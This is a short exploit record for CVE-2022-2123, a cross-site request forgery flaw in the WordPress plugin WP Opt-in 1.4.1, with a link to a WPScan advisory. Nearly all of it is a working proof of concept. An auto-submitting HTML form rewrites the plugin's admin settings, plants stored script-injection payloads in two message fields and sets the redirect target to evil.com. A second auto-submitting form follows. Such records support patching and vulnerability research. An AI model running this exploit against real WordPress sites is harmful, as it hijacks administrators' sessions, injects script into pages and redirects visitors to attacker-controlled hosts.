CVE: CVE-2022-2123

Name: WP Opt-in (wp-opt-in)

Version: 1.4.1

Date: 2022-04-20 21:48:09

Advisory: https://wpscan.com/vulnerability/46b634f6-92bc-4e00-a4c0-c25135c61922

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=wp-opt-in%2Fwp-opt-in.php" method="POST">
    <input type="text" name="wpoi_hidden" value="SAb13c">
    <input type="text" name="wpoi_email_from" value="test@example.com">
    <input type="text" name="wpoi_email_subject" value="[example.com] Requested e-mail">
    <input type="text" name="wpoi_email_message" value="hacked">
    <input type="text" name="wpoi_email_notify" value="">
    <input type="text" name="wpoi_msg_bad" value="<p><b>Bad e-mail address.</b></p>">
    <input type="text" name="wpoi_msg_fail" value="<p><b>Failed sending to e-mail address.</b></p>">
    <input type="text" name="wpoi_msg_sent" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_header" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_footer" value="</div>">
    <input type="text" name="wpoi_form_email" value="E-mail:">
    <input type="text" name="wpoi_form_send" value="Submit">
    <input type="text" name="wpoi_url_redir" value="https://evil.com">
    <input type="text" name="Submit" value="Update Options »">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/asasas" method="POST">
    <input type="text" name="wpoi_email" value="test@example.com">
</form>
<script>
    document.forms[0].submit();
</script>